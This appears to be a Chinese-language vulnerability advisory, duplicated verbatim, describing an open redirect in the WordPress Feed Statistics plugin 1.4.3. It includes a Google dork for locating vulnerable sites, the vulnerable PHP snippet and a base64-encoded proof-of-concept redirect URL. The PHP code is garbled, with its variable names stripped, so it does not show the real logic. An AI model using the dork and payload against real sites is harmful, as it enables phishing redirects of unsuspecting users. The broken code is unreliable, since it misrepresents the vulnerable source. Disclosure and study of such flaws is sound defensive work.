### 0x01 漏洞简述 URL 重定向也就是 URL跳转,攻击者可以构造URL将用户的访问重定向到指定页面。 Wordpress Feed Statistics Plugin V 1.4.3 feed-statistics.php 文件中存在重定向漏洞,攻击者通过构造url的base64编码,可以将用户的访问重定向到指定页面。 公开时间:2016-01-09 Google Dork : "inurl:wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=" ### 0x02 漏洞细节 漏洞页面: wordpress-feed-statistics/feed-statistics.php 漏洞参数: url 漏洞代码 : ``` <?php if (isset(["url"])){ = base64_decode(["url"]); header("Location: ".); return; } ?> ``` 攻击方式: site.com/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly9nb29nbGUuY29t [base64 encoded]
### 0x01 漏洞简述 URL 重定向也就是 URL跳转,攻击者可以构造URL将用户的访问重定向到指定页面。 Wordpress Feed Statistics Plugin V 1.4.3 feed-statistics.php 文件中存在重定向漏洞,攻击者通过构造url的base64编码,可以将用户的访问重定向到指定页面。 公开时间:2016-01-09 Google Dork : "inurl:wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=" ### 0x02 漏洞细节 漏洞页面: wordpress-feed-statistics/feed-statistics.php 漏洞参数: url 漏洞代码 : ``` <?php if (isset(["url"])){ = base64_decode(["url"]); header("Location: ".); return; } ?> ``` 攻击方式: site.com/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly9nb29nbGUuY29t [base64 encoded]